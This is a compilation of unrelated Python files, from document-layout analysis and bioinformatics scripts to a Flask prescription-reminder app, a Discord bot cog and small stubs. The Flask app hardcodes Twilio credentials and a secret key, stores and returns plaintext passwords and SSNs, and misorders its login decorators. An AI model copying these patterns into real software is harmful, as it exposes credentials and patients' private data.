raise ValueError("Provide a proper mode, possible options are 'horizontal' (0) or 'vertical' (1).")
image_height, image_width = image.shape[:2]
separators = None
if mode == 0:
profiles = np.sum(image, axis=1) / 255
separators = [(i, hp / image_width) for i, hp in enumerate(profiles) if hp / image_width > threshold]
elif mode == 1:
profiles = np.sum(image, axis=0) / 255
separators = [(i, vp / image_height) for i, vp in enumerate(profiles) if vp / image_height > threshold]
return separators
# def get_separators(self, threshold_horizontal=0.1, threshold_vertical=0.5):
#
# height, width = self.images['text_block'].shape
#
# horizontal_profiles = np.sum(self.images['text_block'], axis=1) / 255
# vertical_profiles = np.sum(self.images['text_block'], axis=0) / 255
#
# # We check for '<', because we search for blackruns in the textblock netoutput!
# horizontal_separators = [(i, hp / width) for i, hp in enumerate(horizontal_profiles) if
# hp / width < threshold_horizontal]
# vertical_separators = [(i, vp / height) for i, vp in enumerate(vertical_profiles) if
# vp / height < threshold_vertical]
#
# print(len(horizontal_separators))
# print(horizontal_separators)
# print(len(vertical_separators))
# print(vertical_separators)
#
# return horizontal_separators, vertical_separators
def run_recursion(self, region_rectangle: Rectangle, max_recursion_depth=MAX_RECURSION_DEPTH, mode="horizontal", threshold=0.9):
""" Run recursion to determine the text regions. Make sure to alternate between horizontal and vertical
separator detection. The `mode` parameter determines with which subdivision to start, defaults to 'horizontal'.
:param region_rectangle: determines the region in the original text block image
:param threshold: relative number of white pixels that should be reached to be defined as a white run.
:param mode: same parameter as in method `get_separators`, 'horizontal' or 'vertical'.
:param max_recursion_depth: maximal number of times to run the recursion
:return: a mask that can be applied to the baseline detection output to get a division into text regions
"""
print(MAX_RECURSION_DEPTH - max_recursion_depth)
if max_recursion_depth == 0:
return
image = self.images["text_block"]
image = image[region_rectangle.x: region_rectangle.x + region_rectangle.width][
region_rectangle.y: region_rectangle.y + region_rectangle.height]
# The min_pixel_separator_distance determines up to which (pixel)distance neighboring white runs get merged!
min_pixel_separator_distance = int(self.image_height * MIN_PIXEL_SEPARATOR_DISTANCE_FACTOR)
print(f"min_pixel_separator_distance = {min_pixel_separator_distance}")
# profile_list = self.get_separators(255 - self.images['text_block'], mode, threshold)
profile_list = self.get_separators(255 - image, mode, threshold)
index_separators = [i for i, _ in profile_list]
if not index_separators:
return
index_separators_new = []
if index_separators[0] > min_pixel_separator_distance:
index_separators_new.append((0, index_separators[0]))
for i in range(len(index_separators) - 1):
if index_separators[i + 1] - index_separators[i] > min_pixel_separator_distance:
index_separators_new.append((index_separators[i] + 1, index_separators[i + 1]))
if mode == 'horizontal':
if (self.image_height - 1) - index_separators[-1] > min_pixel_separator_distance:
index_separators_new.append((index_separators[-1], self.image_height - 1))
elif mode == 'vertical':
if (self.image_width - 1) - index_separators[-1] > min_pixel_separator_distance:
index_separators_new.append((index_separators[-1], self.image_width - 1))
# print(index_separators)
# print(index_separators_new)
new_mode = None
if mode == "horizontal":
new_mode = "vertical"
elif mode == "vertical":
new_mode = "horizontal"
new_region_rectangle = None
for image_range in index_separators_new:
# image_range is a tuple with x coordinate from
# new_region_rectangle = None
if mode == "horizontal":
# update the y-coordinates and keep the x-coordinates
new_y = image_range[0] + region_rectangle.y
new_height = image_range[1] - image_range[0]
new_region_rectangle = Rectangle(region_rectangle.x, new_y, region_rectangle.width, new_height)
elif mode == "vertical":
# update the x-coordinates and keep the y-coordinates
new_x = image_range[0] + region_rectangle.x
new_width = image_range[1] - image_range[0]
new_region_rectangle = Rectangle(new_x, region_rectangle.y, new_width, region_rectangle.height)
print("REGION RECTANGLE COORD: ", new_region_rectangle.get_vertices())
cv2.rectangle(self.images["empty_image"], new_region_rectangle.get_vertices()[0], new_region_rectangle.get_vertices()[2], (255, 0, 0), 1)
# self.get_separators(self.images["text_block"][image_range[0]:image_range[1]], new_mode, threshold)
self.run_recursion(new_region_rectangle, max_recursion_depth - 1, new_mode, max(0.9*threshold, 0.65))
return new_region_rectangle
def run(self):
rotation_angle = round(self.get_best_rotation_angle(), 4)
self.rotate_images(rotation_angle)
region_rectangle_image = Rectangle(0, 0, self.image_width, self.image_height)
self.run_recursion(region_rectangle_image, threshold=0.9)
plt.set_cmap('gray')
plt.subplot(1, 3, 1)
plt.imshow(self.images["empty_image"])
plt.subplot(1, 3, 2)
plt.imshow(self.images["text_block"])
plt.subplot(1, 3, 3)
plt.imshow(self.images["original_image"])
plt.show()
if __name__ == '__main__':
path_to_image_folder = '/home/max/devel/projects/python/article_separation/data/test_post_processing/textblock/'
path_to_orig_image = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004.jpg')
path_to_tb_outline = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004_OUT0.jpg')
path_to_tb = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004_OUT1.jpg')
path_to_separator = os.path.join(path_to_image_folder, 'ONB_aze_19110701_004_OUT2.jpg')
orig_image = cv2.imread(path_to_orig_image, cv2.IMREAD_UNCHANGED)
tb_outline_image = cv2.imread(path_to_tb_outline, cv2.IMREAD_UNCHANGED)
tb_image = cv2.imread(path_to_tb, cv2.IMREAD_UNCHANGED)
separator_image = cv2.imread(path_to_separator, cv2.IMREAD_UNCHANGED)
orig_image = cv2.resize(orig_image, None, fx=0.4, fy=0.4)
# orig_image_gb = cv2.GaussianBlur(orig_image, (5, 5), 0)
orig_image_gb = orig_image
_, orig_image_gb_bin = cv2.threshold(orig_image_gb, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
tb_pp = TextBlockNetPostProcessor(orig_image_gb_bin, tb_outline_image, tb_image, separator_image)
region_rectangle_image = Rectangle(0, 0, orig_image.shape[1], orig_image.shape[0])
# tb_pp.run_recursion(region_rectangle_image)
#
# text_block_rgb = cv2.cvtColor(tb_pp.images["text_block"], cv2.COLOR_BGR2RGB)
# # text_block_rgb = tb_pp.images["text_block"]
# plt.imshow(text_block_rgb)
# plt.show()
tb_pp.run()
# # CONTOURS TEST
# original_image_rgb = cv2.cvtColor(tb_pp.images["original_image"], cv2.COLOR_BGR2RGB)
# text_block_image_rgb = cv2.cvtColor(tb_pp.images["text_block"], cv2.COLOR_BGR2RGB)
# plt.subplot(1, 2, 1)
# plt.imshow(text_block_image_rgb)
# contours, _ = cv2.findContours(tb_pp.images["text_block"], cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)
# contour_image = cv2.drawContours(text_block_image_rgb, contours, -1, (0, 255, 0), 3)
# plt.subplot(1, 2, 2)
# plt.imshow(text_block_image_rgb)
# plt.show()
# rotation_angle = round(tb_pp.get_best_rotation_angle(), 4)
# tb_pp.rotate_images(rotation_angle)
#
# horizontal_profile_list, vertical_profile_list = tb_pp.get_separators()
#
# index_horizontal = [i for i, _ in horizontal_profile_list]
# index_vertical = [i for i, _ in vertical_profile_list]
#
# white_sep = np.zeros(orig_image.shape, dtype=np.uint8)
# white_sep[:, index_vertical] = 255
# white_sep[index_horizontal, :] = 255
# # white_sep = cv2.resize(white_sep, None, fx=0.5, fy=0.5)
#
# # separator_image = cv2.resize(separator_image, None, fx=0.5, fy=0.5)
# separator_image = np.array((separator_image > 0.2), np.uint8)
# print(separator_image, separator_image.dtype)
# separator_image *= 255
#
# print(separator_image, separator_image.dtype)
# print(white_sep, white_sep.dtype)
#
# add_condition = np.not_equal(white_sep, separator_image)
# black_white_separator = np.copy(white_sep)
# black_white_separator[add_condition] += separator_image[add_condition]
#
# kernel = np.ones((5, 5), np.uint8)
# black_white_separator = cv2.morphologyEx(black_white_separator, cv2.MORPH_CLOSE, kernel)
#
# plt.set_cmap("gray")
# plt.subplot(1, 4, 1)
# plt.imshow(white_sep)
# plt.subplot(1, 4, 2)
# plt.imshow(separator_image)
# plt.subplot(1, 4, 3)
# plt.imshow(black_white_separator)
# plt.subplot(1, 4, 4)
# plt.imshow(orig_image)
# plt.show()
#
# # cv2.imshow('white separator', white_sep)
# # cv2.imshow('black separator net', separator_image)
# # cv2.imshow('black white separator', black_white_separator)
# # cv2.waitKey(0)
# # cv2.destroyAllWindows()
#
# vertical_profile = np.sum(black_white_separator, axis=0)
# horizontal_profile = np.sum(black_white_separator, axis=1)
#
# horizontal = [(i, hp / orig_image.shape[1] / 255) for i, hp in enumerate(horizontal_profile) if
# hp / orig_image.shape[1] / 255 < 0.2]
# vertical = [(i, vp / orig_image.shape[0] / 255) for i, vp in enumerate(vertical_profile) if
# vp / orig_image.shape[0] / 255 < 0.2]
#
# horizontal_index = [i for i, _ in horizontal]
# vertical_index = [i for i, _ in vertical]
#
# print(horizontal_index)
# print(vertical_index)
#
#
# def convert_to_ranges(index_list):
# range_list = []
# skip = False
# for i in range(len(index_list) - 1):
# if not skip:
# begin = index_list[i]
# if index_list[i + 1] - index_list[i] < 3:
# skip = True
# continue
# skip = False
# end = index_list[i]
# range_list.append((begin, end))
# return range_list
#
#
# print(convert_to_ranges(horizontal_index))
# print(convert_to_ranges(vertical_index))
#
# # tb_image_binarized = np.array((tb_image > 0.8), np.uint8) * 255
# # print(tb_image_binarized)
# # # erosion_kernel = np.array([[0, 1, 0], [0, 1, 0], [0, 1, 0]], dtype=np.uint8)
# # erosion_kernel = np.ones([8, 8], dtype=np.uint8)
# # print(erosion_kernel)
# # tb_image_erosion = cv2.erode(tb_image_binarized, erosion_kernel, iterations=1)
# # tb_image_erosion = cv2.resize(tb_image_erosion, None, fx=0.4, fy=0.4)
# # print(tb_image_erosion)
# # cv2.imshow("erosion image textblock", tb_image_erosion)
# # cv2.waitKey(0)
# # cv2.destroyAllWindows()
# # exit(1)
|
import sys
import requests
from chooseplayer import *
if sys.version_info[0] < 3:
import Tkinter as Tk
import ttk
else:
import tkinter as Tk
from tkinter import ttk, tkMessageBox
API_BASE_URL = "https://mocktesisasobiguaapi.azurewebsites.net/v1"
# API_BASE_URL = "https://localhost:5001/v1"
HEADER = {"Content-Type": "application/json", "Accept": "*"}
class Login():
def __init__(self):
self.root = Tk.Tk()
self.root.title("CDAG - ASOBIGUA")
lbl = Tk.Label(self.root, text = "Usuario:")
lbl.grid(row = 0, column = 0)
self.txbUsername = Tk.Entry(self.root)
self.txbUsername.grid(row = 0, column = 1)
lbl = Tk.Label(self.root, text = "Password:")
lbl.grid(row = 1, column = 0)
self.txbPassword = Tk.Entry(self.root, show = "*")
self.txbPassword.grid(row = 1, column = 1)
self.loginButton = Tk.Button(self.root, text = "Iniciar sesion", command = self.login)
self.loginButton.grid(row = 2, column = 1)
self.lblLoginResult = Tk.Label(self.root)
self.lblLoginResult.grid(row = 3, column = 1)
Tk.mainloop()
def api_url(self, url):
s = "%s%s" % (API_BASE_URL, url)
print(s)
return s
def login(self):
username = self.txbUsername.get()
password = self.txbPassword.get()
payload = str({
"username": username,
"password": password
})
response = requests.post(self.api_url("/users/login"), data=payload, headers=HEADER)
if response.status_code != 200:
self.lblLoginResult.config(text = response.json()['message'])
return
self.lblLoginResult.config(text = "")
self.trainer = response.json()
self.root.destroy()
if self.trainer['userType'] == 'Trainer':
choose = ChoosePlayer(self.trainer)
self.player = choose.player
else:
self.player = self.trainer
print(self.trainer)
print(self.player)
def main():
login = Login()
if __name__ == '__main__':
main() |
month = input()
nights = int(input())
total_price_apartment = 0
total_price_studio = 0
discount_studio = 0
discount_apartment = 0
if month == 'May' or month == 'October':
total_price_studio = nights * 50
total_price_apartment = nights * 65
if nights > 14:
discount_studio = 0.30
elif nights > 7:
discount_studio = 0.05
elif month == 'June' or month == 'September':
total_price_studio = nights * 75.2
total_price_apartment = nights * 68.7
if nights > 14:
discount_studio = 0.2
elif month == 'July' or month == 'August':
total_price_studio = nights * 76
total_price_apartment = nights * 77
if nights > 14:
discount_apartment = 0.1
total_price_studio = total_price_studio - (total_price_studio * discount_studio)
total_price_apartment = total_price_apartment - (total_price_apartment * discount_apartment)
print(f"Apartment: {total_price_apartment:.2f} lv.")
print(f"Studio: {total_price_studio:.2f} lv.") |
#!/usr/bin/env python3
"""
This module prepares reference tables for other modules
Inputs:
--------------------------------------------------------------
1. Gencode gtf file
2. Gencode fasta file
--------------------------------------------------------------
Output Tables:
-------------------------------------------------------------
1. ensg -> gene
2. isoname (transcript name) -> gene
3. ensp -> gene
4. isoform, gene, length table
5. gene -> min, max, average transcript length
6. protein coding genes
--------------------------------------------------------------
"""
# Import Modules
import pandas as pd
import argparse
import csv
import os
from collections import defaultdict
import gtfparse
# Define Functions
def GenMap(gtf_file, results):
"""
This function prepares a series of tables that map gene, transcript and protein level information.
"""
# Initialize Lists and Dictionaries
genes = {} # ENSG -> <genename>
isos = {} # ENST -> <iso-name>
ensps = defaultdict(set) # gene_name -> <set(ENSPs)>
isonames = defaultdict(set) # transcript name -> gene_name
# Parse GTF file
for line in open(gtf_file):
if line.startswith('#'):
pass
else:
wds = line.split('\t')
cat = wds[2]
if cat in ['transcript']:
ensg = line.split('gene_id "')[1].split('"')[0]
gene = line.split('gene_name "')[1].split('"')[0]
enst = line.split('transcript_id "')[1].split('"')[0]
transcript_name = line.split('transcript_name "')[1].split('"')[0]
genes[ensg] = gene
isos[enst] = transcript_name
isonames[gene].add(transcript_name)
if 'transcript_type "protein_coding' in line:
gen = line.split('gene_name "')[1].split('"')[0]
ensp = line.split('protein_id "')[1].split('"')[0]
ensps[gen].add(ensp)
# Save Tables in results/PG_ReferenceTables
with open(results.ensg_gene, 'w') as ofile:
for ensg, gene in genes.items():
ofile.write(ensg + '\t' + gene + '\n')
with open(results.enst_isoname, 'w') as ofile:
for enst, isoname in isos.items():
ofile.write(enst + '\t' + isoname + '\n')
with open(results.gene_ensp, 'w') as ofile:
for gen, ensp_set in ensps.items():
for ensp in ensp_set:
ofile.write(gen + '\t' + ensp + '\n')
with open(results.gene_isoname, 'w') as ofile:
for gene, transcript_set in isonames.items():
for transcript in transcript_set:
ofile.write(gene + '\t' + transcript + '\n')
print("The ensg_to_gene, enst_to_isoname, ensp_to_gene and isoname_to_gene files have been prepared")
def IsoLenTab(fa_file, results):
"""
Prepare a table that provides gene and length information for each isoform
"""
# Initialize Lists
isos = []
genes = []
lens = []
# Parse fafsa file to append isoform, gene and length information
for line in open(fa_file):
if line.startswith('>'):
isos.append(line.split('|')[4].split('""')[0])
genes.append(line.split('|')[5].split('""')[0])
lens.append(line.split('|')[6].split('""')[0])
# Export Data as a DataFrame and a tsv file
data = {'isoform': isos, 'gene': genes, 'length': [int(x_len) for x_len in lens]}
df = pd.DataFrame(data)
df.to_csv(results.isoname_lens, sep='\t', index=False)
print("The isoform length table has been prepared.")
return df
def GeneLenTab(IsolenFile, results):
"""
Prepare a table that provides the min, max and average length of a gene
"""
cut = IsolenFile[['gene', 'length']]
# Map genes to lengths and calc average, min and max. Round mean to nearest tenth. Reset indices.
length= cut.groupby(['gene']).length.agg(['mean', 'min', 'max'])
length['mean'] = length['mean'].round(decimals = 1)
length = length.reset_index(level=['gene'])
# Change column names and save the table
length.columns =['gene', 'avg_len', 'min_len', 'max_len']
length.to_csv(results.gene_lens, sep="\t", index=False)
print('Prepared the gene length statistics table')
def protein_coding_genes(results):
df_gtf = gtfparse.read_gtf(results.gtf_file)
df_gtf = df_gtf[df_gtf['feature'] == 'gene']
df_gtf = df_gtf[df_gtf['gene_type'] == 'protein_coding']
protein_coding_genes = df_gtf['gene_name'].unique()
with open(results.pc_genes, 'w') as filehandle:
for gene in protein_coding_genes:
filehandle.write(f"{gene}\n")
def main():
# If results folder does not exist, make it
# TODO - maybe remove
rdir = './dump'
if not os.path.exists(rdir):
os.mkdir(rdir)
# Command line arguments
parser = argparse.ArgumentParser(description='Proccess ORF related file locations')
parser.add_argument('--gtf','-g',action='store', dest= 'gtf_file',help='Gencode GTF input file location')
parser.add_argument('--fa','-fa',action='store', dest= 'fa_file',help='Gencode Fafsa input file location')
parser.add_argument('--ensg_gene', '-oeg', action='store', dest='ensg_gene', help='ensg to gene output file location')
parser.add_argument('--enst_isoname', '-oei', action='store', dest='enst_isoname', help='enst to isoname output file location')
parser.add_argument('--gene_ensp', '-oge', action='store', dest='gene_ensp', help='Gene to ensp output file location')
parser.add_argument('--gene_isoname', '-ogi', action='store', dest='gene_isoname', help="Gene to isoname output file location")
parser.add_argument('--isoname_lens', '-oigl', action='store', dest='isoname_lens', help='Isoname length table output location')
parser.add_argument('--gene_lens', '-ogls', action='store', dest='gene_lens', help='Gene Length statistics output location')
parser.add_argument('--protein_coding_genes', '-pcg', action='store', dest='pc_genes', help='Protein Coding genes output location')
results = parser.parse_args()
# Make ensg -> gene, enst -> isoname, ensp -> gene and isoname -> gene mapping files
GenMap(results.gtf_file, results)
# Prepare Gene Isoform Length table
df = IsoLenTab(results.fa_file, results)
# Prepare Gene Length Table
GeneLenTab(df, results)
protein_coding_genes(results)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
from ast import literal_eval
from subprocess import Popen, PIPE, STDOUT
import hashlib
import json
import os.path
import shlex
import subprocess
import sys
binstub = "bandit3"
include_paths = ["."]
# severity converts the severity of a bandit issue
# to the severity accepted by CodeClimate
def severity(sev):
if sev == "HIGH":
return "major"
if sev == "MEDIUM":
return "minor"
if sev == "LOW":
return "info"
if os.path.exists("/config.json"):
contents = open("/config.json").read()
config = json.loads(contents)
# set python version
if 'config' in config:
if config["config"].get("python_version"):
version = config["config"].get("python_version")
if version == "2" or version == 2:
binstub = "bandit2"
elif version != "3" and version != 3:
sys.exit("Invalid python_version; must be either 2 or 3")
# set included paths
if config.get("include_paths"):
include_paths = config.get("include_paths", ["."])
include_paths = [shlex.quote(path) for path in include_paths if os.path. isdir(path) or path.endswith(".py")]
if len(include_paths) > 0:
included_paths = " ".join(include_paths)
cmd = f"{binstub} -r {included_paths} -f json"
if os.path.exists("/code/.bandit.yaml"):
cmd = cmd + f" -c /code/.bandit.yaml"
output = subprocess.run([cmd], stdout=subprocess.PIPE, shell=True)
output = literal_eval(output.stdout.decode('utf8'))
for result in output["results"]:
dict = {
"type": "issue",
"check_name": result["test_name"],
"description": result["issue_text"],
"categories": ["Security"],
"severity": severity(result["issue_severity"]),
"fingerprint": hashlib.md5((result["test_id"] + result['filename'] + result['code']).encode('utf-8')).hexdigest(),
"location": {
"path": result["filename"],
"lines": {
"begin": min(result["line_range"]),
"end": max(result["line_range"])
}
}
}
print(json.dumps(dict) + '\0')
else:
print("Empty workspace; skipping...", file = sys.stderr)
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask import request, jsonify
from flask_cors import CORS
from twilio.rest import TwilioRestClient
from flask_apscheduler import APScheduler
from flask.ext.session import Session
from flask_login import LoginManager, login_required, login_user, logout_user
import datetime
app = Flask(__name__)
CORS(app)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)
app.secret_key = 'A0Zr98j/37X R~XaH!jcN]LDX/,?ET'
app.config['SESSION_TYPE'] = 'filesystem'
sess = Session()
sess.init_app(app)
SCHEDULER_API_ENABLED = True
scheduler = APScheduler()
scheduler.init_app(app)
scheduler.start()
login_manager = LoginManager()
login_manager.session_protection = None
login_manager.login_view = "loginDoc"
login_manager.init_app(app)
LOGGED_IN_USER = None
###############################################################################
# MODEL
###############################################################################
class Doctor(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(256), index=True)
address = db.Column(db.String(256), index=True)
dob = db.Column(db.DateTime, index=True)
practiceName = db.Column(db.String(256), index=True)
specialty = db.Column(db.String(256), index=True)
email = db.Column(db.String(256), index=True, unique=True)
password = db.Column(db.String(256), index=True)
authenticated = db.Column(db.Boolean, default=False)
def is_active(self):
"""True, as all users are active."""
return True
def get_id(self):
"""Return the email address to satisfy Flask-Login's requirements."""
return self.email
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.authenticated
def is_anonymous(self):
"""False, as anonymous users aren't supported."""
return False
def to_dict(self):
d = {
'id': self.id,
'name': self.name,
'address': self.address,
'dob': self.dob,
'practiceName': self.practiceName,
'specialty': self.specialty,
'email': self.email,
'password': self.password,
}
return d
@login_manager.user_loader
def load_user(user_id):
return Doctor.query.get(user_id)
class Patient(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(256), index=True)
phoneNumber = db.Column(db.Integer)
email = db.Column(db.String(256), index=True)
address = db.Column(db.String(256), index=True)
dob = db.Column(db.DateTime, index=True)
ssn = db.Column(db.String, index=True)
doctor = db.relationship('Doctor',
backref=db.backref('patients'))
doctor_id = db.Column(db.Integer, db.ForeignKey('doctor.id'))
def to_dict(self):
d = {
'id': self.id,
'name': self.name,
'address': self.address,
'dob': self.dob,
'ssn': self.ssn,
'email': self.email,
'phoneNumber': self.phoneNumber,
'prescriptions': [p.to_dict() for p in self.prescriptions]
}
return d
class Prescription(db.Model):
id = db.Column(db.Integer, primary_key=True)
patient_id = db.Column(db.Integer, db.ForeignKey('patient.id'))
patient = db.relationship('Patient',
backref=db.backref('prescriptions'))
doctor_id = db.Column(db.Integer, db.ForeignKey('doctor.id'))
doctor = db.relationship('Doctor',
backref=db.backref('prescriptions'))
drugName = db.Column(db.String(256), index=True)
dosage = db.Column(db.Integer, index=True)
# take every x days
dosagePeriod = db.Column(db.Integer, index=True)
# number of doses per period
dosageNumber = db.Column(db.Integer, index=True)
totalNumDoses = db.Column(db.Integer, index=True)
datePrescribed = db.Column(db.DateTime, index=True)
timeOfDay = db.Column(db.String(256), index=True)
pharmacyFilled = db.Column(db.Boolean, index=True)
def to_dict(self):
d = {
'patient_id': self.patient_id,
'doctor_id': self.doctor_id,
'drugName': self.drugName,
'dosage': self.dosage,
'dosagePeriod': self.dosagePeriod,
'dosageNumber': self.dosageNumber,
'totalNumDoses': self.totalNumDoses,
'datePrescribed': self.datePrescribed,
'timeOfDay': self.timeOfDay,
'pharmacyFilled': self.pharmacyFilled
}
return d
# db.drop_all()
db.create_all()
#############################################################################
# VIEW
#############################################################################
def createDoc(email, password, name="", address="",
practiceName="", specialty=""):
doc = Doctor()
doc.email = email
doc.password = password
doc.name = name
doc.address = address
doc.practiceName = practiceName
doc.specialty = specialty
db.session.add(doc)
db.session.commit()
return doc
def createPatient(doctor, name, phoneNumber, email="", address="",
ssn=None):
p = Patient()
p.name = name
p.phoneNumber = phoneNumber
p.email = email
p.address = address
p.ssn = ssn
p.doctor = doctor
db.session.add(p)
db.session.commit()
return p
def createPrescription(patient, doctor,
dosage=None, dosagePeriod=None, dosageNumber=None,
totalNumDoses=None,
timeOfDay='',
pharmacyFilled=False, drugName=''):
p = Prescription()
p.patient = patient
p.doctor = doctor
p.drugName = drugName
p.dosage = dosage
p.dosagePeriod = dosagePeriod
p.dosageNumber = dosageNumber
p.totalNumDoses = totalNumDoses
p.datePrescribed = datetime.date.today()
p.timeOfDay = timeOfDay
p.pharmacyFilled = pharmacyFilled
db.session.add(p)
db.session.commit()
return p
@app.route('/loginDoctor', methods=['POST'])
def loginDoc():
if request.method == 'POST':
email = request.json['email']
password = request.json['password']
doctor = Doctor.query.filter_by(email=email, password=password).first()
if type(doctor) != Doctor:
return "Invalid username or password"
else:
doctor.authenticated = True
db.session.add(doctor)
db.session.commit()
login_user(doctor, remember=True)
plist = []
for p in doctor.patients:
plist.append(p.to_dict())
return jsonify({'doctor': doctor.to_dict(), 'patients': plist})
@app.route('/logout', methods=['POST'])
@login_required
def logout():
"""Logout the current user."""
d = Doctor.query.get(int(request.json['id']))
d.authenticated = False
db.session.add(d)
db.session.commit()
logout_user()
return "Logged out"
@login_required
@app.route('/addPrescriptionView', methods=['POST'])
def addPrescription():
if request.method == 'POST':
createPrescription(Patient.query.get(int(request.json['patient_id'])),
Doctor.query.get(int(request.json['doctor_id'])),
request.json['drugName'],
request.json['dosage'],
request.json['dosagePeriod'],
request.json['dosageNumber'],
request.json['totalNumDoses'],
request.json['timeOfDay'])
return "Prescription added"
@login_required
@app.route('/addPatientView', methods=['POST'])
def addPatient():
if request.method == 'POST':
createPatient(Doctor.query.get(request.json['id']),
request.json['name'],
request.json['phoneNumber'],
request.json['email'],
request.json['address'],
request.json['ssn'])
return "Patient added"
@login_required
@app.route('/getPatients', methods=["POST"])
def getPatients():
if request.method == 'POST':
doc = Doctor.query.get(request.json)
plist = []
for p in doc.patients:
plist.append(p.to_dict())
return jsonify({'patients': plist})
@login_required
@app.route('/getPrescriptions', methods=["POST"])
def getPrescriptions():
if request.method == 'POST':
doc = Doctor.query.get(int(request.json['doctor_id']))
patient = Patient.query.get(int(request.json['patient_id']))
plist = []
for prescription in patient.prescriptions:
if prescription.doctor == doc:
plist.append(prescription.to_dict())
return jsonify({'prescriptions': plist})
@app.route('/addDoctorView', methods=['POST'])
def addDoctor():
if request.method == 'POST':
createDoc(request.json['email'],
request.json['password'],
name=request.json['name'],
address=request.json['address'],
practiceName=request.json['practiceName'],
specialty=request.json['specialty'])
return "Doctor added"
@login_required
@app.route('/sms', methods=['POST'])
def textPatient():
if request.method == 'POST':
patient = Patient.query.get(int(request.json['id']))
number = str(patient.phoneNumber)
sendtext(number, message="This is a test message")
return "success"
#############################################################################
# TWILLIO
#############################################################################
ACCOUNT_SID = "AC196bde1976f17bec537a18d74ddfc9dc"
AUTH_TOKEN = "497c27040c7ef630efe7fb8757ff1c8a"
client = TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN)
class SchedulerConfig(object):
JOBS = [
{
'id': 'sendText',
'func': 'jobs:checkPrescriptions',
'args': (),
'trigger': 'interval',
'seconds': 60
}
]
def checkPrescriptions():
MORNING = 8
NOON = 12
EVENING = 17
curDate = datetime.date.today()
curTime = datetime.datetime.now().hour
for patient in Patient.query.all():
phoneNumber = str(patient.phoneNumber)
drugList = []
for p in patient.prescriptions:
if p.totalNumDoses > 0 and (days_between(curDate, p.datePrescribed)
% p.dosagePeriod == 0):
if "Morning" in p.timeOfDay and curTime == MORNING:
drugList.append(p)
p.totalNumDoses = p.totalNumDoses - p.dosageNumber
db.session.add(p)
db.session.commit()
elif "Noon" in p.timeOfDay and curTime == NOON:
drugList.append(p)
p.totalNumDoses = p.totalNumDoses - p.dosageNumber
db.session.add(p)
db.session.commit()
elif "Evening" in p.timeOfDay and curTime == EVENING:
drugList.append(p)
p.totalNumDoses = p.totalNumDoses - p.dosageNumber
db.session.add(p)
db.session.commit()
sendtext(phoneNumber, drugList)
def sendtext(phoneNumber, message=None, drugList=None):
client.sms.messages.create(to=str(phoneNumber),
from_="18562194208",
body=message)
if drugList is not None:
text = "Please take these drugs today: \n"
for drug in drugList:
text += "{} doses of {}\n".format(drug.dosageNumber, drug.drugName)
client.sms.messages.create(to=str(phoneNumber),
from_="18562194208",
body=text)
def days_between(d1, d2):
d1 = datetime.datetime.strptime(d1, "%Y-%m-%d")
d2 = datetime.datetime.strptime(d2, "%Y-%m-%d")
return abs((d2 - d1).days)
|
from discord.ext import commands, tasks
from src.decorators import needsDatabase
from DO.game import GameDO
from singleton.game import Game
class GameCog(commands.Cog):
instance = None
@staticmethod
def getInstance():
"""Returns the instance of the singleton
Returns:
GameCog: The instance
"""
if GameCog.instance is None:
GameCog()
return GameCog.instance
def __init__(self):
if GameCog.instance is not None:
raise Exception("This class is a singleton !")
GameCog.instance = self
self.nearGames = []
self.nearVotes = []
self.endGameAndVotes.start()
self.loadNearlyFinishedGamesAndVotes.start()
@tasks.loop(seconds=1)
async def endGameAndVotes(self):
for game in self.nearGames:
if game.just_ended_game:
game.endGame()
await Game.getInstance().advertiseEnd(game_id=game.id, phase=1)
print("Advertising for votes")
await Game.getInstance().showParticipations(game_id=game.id, vote=True)
for vote in self.nearVotes:
if vote.just_ended_vote:
vote.endVote()
await Game.getInstance().advertiseEnd(game_id=vote.id, phase=2)
print("Advertising for winner")
await Game.getInstance().showParticipations(game_id=vote.id, vote=False)
@needsDatabase
def getNearlyEndingGames(self, db):
"""Retreive both the nearly ending games and the nearly ending votes"""
games = db.fetch(script="get_ending_games", params=(300,))
nearGames = []
for game_id in games:
game = GameDO(id=int(game_id[0])).load()
nearGames.append(game)
self.nearGames = nearGames
votes = db.fetch(script="get_ending_votes", params=(300,))
nearVotes = []
for vote_id in votes:
vote = GameDO(id=int(vote_id[0])).load()
nearVotes.append(vote)
self.nearVotes = nearVotes
@tasks.loop(seconds=10)
async def loadNearlyFinishedGamesAndVotes(self):
"""
Cog task to retreive both the nearly ending games and the
nearly ending votes
"""
self.getNearlyEndingGames()
|
from dataclasses import dataclass
import datetime
@dataclass
class Learning:
"""The main model in the TIL"""
title: str
description: str
timestamp: datetime.date
|
from django.urls import re_path
from .views import SingleSignOn
urlpatterns = [re_path(r"^sso/$", SingleSignOn.as_view())]
|
import requests
from optimizely_platform import exceptions
from optimizely_platform import objects
def get_dynamic_audience_conditions(integration_settings):
AUDIENCE_OPTIONS_ENDPOINT = (
'https://integrations.optimizely.how/api/{0}/campaigns.json')
account_id = integration_settings['account_id']
request_url = AUDIENCE_OPTIONS_ENDPOINT.format(account_id)
response = requests.get(request_url).json()
# Build list of audience conditions
audience_condition_options = []
try:
for campaign in response['campaigns']:
condition = objects.AudienceConditionOption(campaign['identifier'], campaign['name'].strip())
audience_condition_options.append(condition)
return [objects.AudienceCondition('Sample Condition', audience_condition_options)]
except:
raise
def validate_integration_settings(integration_settings):
try:
verify_account(integration_settings['account_id'])
except:
raise exceptions.IntegrationSettingsValidationError(
'Your Account ID appears to be invalid.')
def verify_account(account_id):
VERIFY_ACCOUNT_ENDPOINT = 'https://api.sample-app.com/verify/'
return requests.get(VERIFY_ACCOUNT_ENDPOINT + account_id).json()
|
from typing import Iterable, List, Tuple, Any
from dataclasses import dataclass, field
import logging
import sys
from abc import abstractmethod, ABCMeta
import itertools as it
import pandas as pd
from zensols.persist import Stash, PrimeableStash
from zensols.multi import MultiProcessStash
from zensols.nlp import FeatureDocument
from zensols.deepnlp.vectorize import FeatureDocumentVectorizerManager
